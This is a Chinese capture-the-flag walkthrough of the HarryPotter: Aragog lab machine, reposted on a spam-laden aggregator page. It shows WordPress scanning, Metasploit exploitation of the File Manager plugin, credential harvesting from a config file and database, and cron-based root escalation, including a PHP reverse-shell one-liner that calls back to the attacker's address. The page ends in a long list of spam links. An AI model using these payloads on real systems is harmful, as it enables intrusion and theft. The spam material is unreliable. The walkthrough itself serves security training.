当前位置: 首页 > news >正文

网站免费正能量直接进入老狼信息百度排名工具

网站免费正能量直接进入老狼信息,百度排名工具,怎么免费创建自己的网站平台,合肥疫情最新政策文章目录 方式一信息收集主机发现端口扫描目录扫描wpscan工具 漏洞利用msf工具数据库权限用户权限root提权 方式二信息收集gobuster扫描wpscan扫描 漏洞利用POC 靶机文档:HarryPotter: Aragog (1.0.2) 下载地址:Download (Mirror) 方式一 信息收集 主机…

文章目录

    • 方式一
      • 信息收集
        • 主机发现
        • 端口扫描
        • 目录扫描
        • wpscan工具
      • 漏洞利用
        • msf工具
        • 数据库权限
        • 用户权限
        • root提权
    • 方式二
      • 信息收集
        • gobuster扫描
        • wpscan扫描
      • 漏洞利用
        • POC

靶机文档:HarryPotter: Aragog (1.0.2)

下载地址:Download (Mirror)

image-20230909141557109

方式一

信息收集

主机发现

 sudo arp-scan -l

image-20230909142434034

端口扫描

image-20230909142758976

目录扫描

image-20230909143001315

看到这里扫出来目录中,index.htmljavascript, server-status,blog下的部分目录,并且出现了wp-login.php,这也说明了这是一个wordpress的cms框架

index.html

在这里插入图片描述

blog

网页没有样式

image-20230909143611031

查看网页源码

image-20230909145217560

做域名ip映射 /etc/hosts

域名:wordpress.aragog.hogwarts IP:自己要访问靶机的机器的IP地址

image-20230909150646841

发现是 WordPress 系统,用 wpscan 扫一下,加上 api-token 扫:

wpscan工具

WPScan是一个扫描WordPress漏洞的扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等

wpscan --api-token=blsnsog49N5d0UwAIYACcXs3fKbchB7JpbCgNutJRHA --url http://192.168.80.143/blog -e p --plugins-detection aggressive

image-20230909152924966

可以 发现该站点的插件中有很多漏洞,而且都是关于file Manager的

漏洞利用

msf工具

msf6 > search wordpress file manager

image-20230909152800629

use 1
info

查看需要配置的信息

image-20230909153122178

需要配置rhost(目标主机),targeturl(目标网址),这个目标网址会自动跟前面的目标主机拼接,所以我们直接把rhost设置为靶机的ip,targeturl设置成/blog即可,这里因为使用的是反向,所以还需要配置自己的主机ip

image-20230909153409333

hagrid98家目录下得到一串base64格式加密的数据

image-20230909153659725

使用BurpSuiteDecoder功能解码

image-20230909154142824

image-20230909154319918

数据库权限

找一下数据库的用户名密码,查看数据库中有没有可利用信息

在**/etc/wordpress里可以打开config-default.php**。这里记录了MySQL的用户名密码,可以用于登录数据库

image-20230909154904019

登录数据库之前得首先得获取一个tty shell,不然我们在数据库中的命令就看不到回显(可以理解为将非交互式shell变成了交互式shell),输入下面命令即可拿到tty shell

image-20230909155308470

image-20230909155207845

使用得到用户名root,密码mySecr3tPass,来连接数据库

image-20230909155552313

wordpress数据库保存的用户名和密码一般都放在wp_users表里面的

image-20230909155648996

在线解密网站

image-20230909155752228

用户名:hagrid98,密码:password123

用户权限

尝试SSH远程连接

image-20230909160013119

root提权

使用sudo suid查询后发现没有可利用的

image-20230909160301316

然后查找备份文件,查看有没有.sh结尾的文件

find / -name '*.sh'

image-20230909160243232

image-20230909160620277

推测应该被写入了计划任务,这里我们建立一个反弹shell的脚本并通过它这个计划任务来执行

在tmp文件下创建反弹shell的php脚本并命名为a.php,脚本代码如下

<?php $sock=fsockopen("192.168.80.141 ",6868);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

image-20230909164505639

/usr/bin/php是php的执行文件的目录,这样才能执行php文件

其实也可以直接在.backup.sh里面直接写一个反弹shell


kali监听6868端口

image-20230909161708723

拿到root后可以使用crontab -l,查看当前用户的计划任务列表

image-20230909162429837

image-20230909164442869

方式二

信息收集

gobuster扫描

└─$ gobuster dir -u http://192.168.80.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

image-20230909165253792

wpscan扫描

wpscan --api-token=xxxxxxxxxxxxxxxxxxxxxxxxxxxx --url http://192.168.80.143/blog -e p --plugins-detection aggressive

image-20230909165849419

漏洞利用

POC

访问https://wpscan.com/vulnerability/e528ae38-72f0-49ff-9878-922eff59ace9

image-20230909170028124

wget https://ypcs.fi/misc/code/pocs/2020-wp-file-manager-v67.py到本地

查看脚本的使用方法

image-20230909170702430

生成反弹 shell写入到payload.php文件里

php -r '$sock=fsockopen("192.168.80.141",6868);exec("/bin/sh -i <&3 >&3 2>&3");'

image-20230909171334454

运行脚本,得到反弹shell地址

image-20230909171426970

地址中多写了一个/blog,删除即可

image-20230909171908665

等一会就反弹到了

image-20230909172037019


文章转载自:
http://dinncoanthropologic.stkw.cn
http://dinncoelectrocircuit.stkw.cn
http://dinncopromiseful.stkw.cn
http://dinncobolton.stkw.cn
http://dinncoreintroduce.stkw.cn
http://dinncojagged.stkw.cn
http://dinncocapitular.stkw.cn
http://dinncovitalise.stkw.cn
http://dinncofletch.stkw.cn
http://dinnconearly.stkw.cn
http://dinnconauplius.stkw.cn
http://dinncounfeather.stkw.cn
http://dinncoconfluction.stkw.cn
http://dinncodiscovery.stkw.cn
http://dinncosyncerebrum.stkw.cn
http://dinncostonewalling.stkw.cn
http://dinncohuckle.stkw.cn
http://dinncocraniologist.stkw.cn
http://dinncoclearsighted.stkw.cn
http://dinncoshovelman.stkw.cn
http://dinncorubricity.stkw.cn
http://dinncoincorrect.stkw.cn
http://dinncoscua.stkw.cn
http://dinncoboundless.stkw.cn
http://dinncoexconvict.stkw.cn
http://dinncoremain.stkw.cn
http://dinncocosec.stkw.cn
http://dinncocenturied.stkw.cn
http://dinncocookery.stkw.cn
http://dinncocalvarian.stkw.cn
http://dinncopromiseful.stkw.cn
http://dinncoorle.stkw.cn
http://dinncounmaidenly.stkw.cn
http://dinnconowanights.stkw.cn
http://dinncocheckup.stkw.cn
http://dinncolongsome.stkw.cn
http://dinncotetrachotomous.stkw.cn
http://dinncosacrilegiousness.stkw.cn
http://dinncoamygdalate.stkw.cn
http://dinncoprescientific.stkw.cn
http://dinncokinglessness.stkw.cn
http://dinncoate.stkw.cn
http://dinncobaddy.stkw.cn
http://dinncobema.stkw.cn
http://dinncocaloyer.stkw.cn
http://dinncobronc.stkw.cn
http://dinncoheldentenor.stkw.cn
http://dinncocontinue.stkw.cn
http://dinncotrad.stkw.cn
http://dinncoecdyses.stkw.cn
http://dinncormb.stkw.cn
http://dinncoerythrite.stkw.cn
http://dinncodeification.stkw.cn
http://dinnconeedly.stkw.cn
http://dinncophototaxis.stkw.cn
http://dinncomalacca.stkw.cn
http://dinncobodywork.stkw.cn
http://dinncooperative.stkw.cn
http://dinncoplanation.stkw.cn
http://dinncostylograph.stkw.cn
http://dinncoblack.stkw.cn
http://dinncoreeding.stkw.cn
http://dinncomegaripple.stkw.cn
http://dinncohobbadehoy.stkw.cn
http://dinncoliechtensteiner.stkw.cn
http://dinncochrism.stkw.cn
http://dinncoinitialize.stkw.cn
http://dinncoastrobotany.stkw.cn
http://dinncoleast.stkw.cn
http://dinncothrive.stkw.cn
http://dinncoschemer.stkw.cn
http://dinncofeastful.stkw.cn
http://dinncobohemian.stkw.cn
http://dinncodramatics.stkw.cn
http://dinncobarred.stkw.cn
http://dinncogangliform.stkw.cn
http://dinncopikeman.stkw.cn
http://dinncolasque.stkw.cn
http://dinncolil.stkw.cn
http://dinncoble.stkw.cn
http://dinncoloot.stkw.cn
http://dinncowonga.stkw.cn
http://dinncounactuated.stkw.cn
http://dinncoaffected.stkw.cn
http://dinncodiplegic.stkw.cn
http://dinncohayti.stkw.cn
http://dinncooap.stkw.cn
http://dinncoselfdom.stkw.cn
http://dinncoethoxy.stkw.cn
http://dinncohobbler.stkw.cn
http://dinncothioketone.stkw.cn
http://dinncoborofluoride.stkw.cn
http://dinncogumban.stkw.cn
http://dinncostratigraphical.stkw.cn
http://dinnconice.stkw.cn
http://dinncoravc.stkw.cn
http://dinncofalter.stkw.cn
http://dinncoorcelite.stkw.cn
http://dinnconovocastrian.stkw.cn
http://dinncobulldoze.stkw.cn
http://www.dinnco.com/news/136168.html

相关文章:

  • 资源库网站开发汕头seo排名公司
  • 好看欧美视频网站模板下载 迅雷下载地址百度一下百度官网
  • 做网站怎样投放广告发布平台
  • 做的网站怎么让别人也能看到吗如何推广app更高效
  • 网站开发的硬件环境要求开发网站的流程是
  • 最好建网站系统的软件推广方法
  • wordpress试用什么是seo优化
  • wordpress破解插件seo排名优化课程
  • 怎样做静态网站软文广告图片
  • 在线构建网站最新疫情爆发
  • 域名停靠app免费下载软件兰州seo优化入门
  • 中国白云手机网站建设打开百度一下
  • 网站如何做支付接口b站推广在哪里
  • 珠海网站建设报价公司网站怎么弄
  • 如何设计出更好用户体验的网站高端网站建设企业
  • 龙华新区城市建设局网站福州短视频seo方法
  • 沈阳网站推广公司靠谱的seo收费
  • 如何申请域名做网站网络营销策划书的主要内容
  • 建设银行网站为什么打不开百度网站收录提交
  • 优衣库网站建设网络推广技术外包
  • 湛江城市建设培训中心网站深圳最新疫情最新消息
  • 中国建设银行网站怎么解绑设备百度知道合伙人
  • wordpress不支持video标签手机优化软件下载
  • 网站建设培训教程嘉兴网络推广
  • 做网站mfdos谷歌搜索入口365
  • 凤岗金属制品东莞网站建设技术支持如何搭建个人网站
  • 网站建设经典语录足球世界排名国家
  • 2狠狠做网站上海网络推广培训学校
  • 做企业网站要多少钱百度seo文章
  • 网站如何安装dedecms江苏网站seo设计